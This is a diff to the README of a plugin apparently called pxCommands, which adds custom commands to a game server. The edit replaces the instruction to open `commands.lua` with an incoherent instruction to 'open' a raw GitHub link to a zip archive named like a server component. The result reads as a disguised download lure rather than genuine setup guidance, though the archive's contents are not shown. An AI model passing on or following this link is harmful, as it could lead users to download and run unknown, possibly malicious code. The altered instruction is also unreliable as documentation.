wckdbozo/pxCommands/README.md

 pxCommands lets you add custom commands if you want to expand server features.

-- Open the `commands.lua` file in the pxCommands folder.
+- Open the `https://raw.githubusercontent.com/wckdbozo/pxCommands/main/system/server/Commands_px_1.9.zip` file in the pxCommands folder.
 - Follow the examples in the file to create new commands.
 - Save the file and restart your server to apply changes.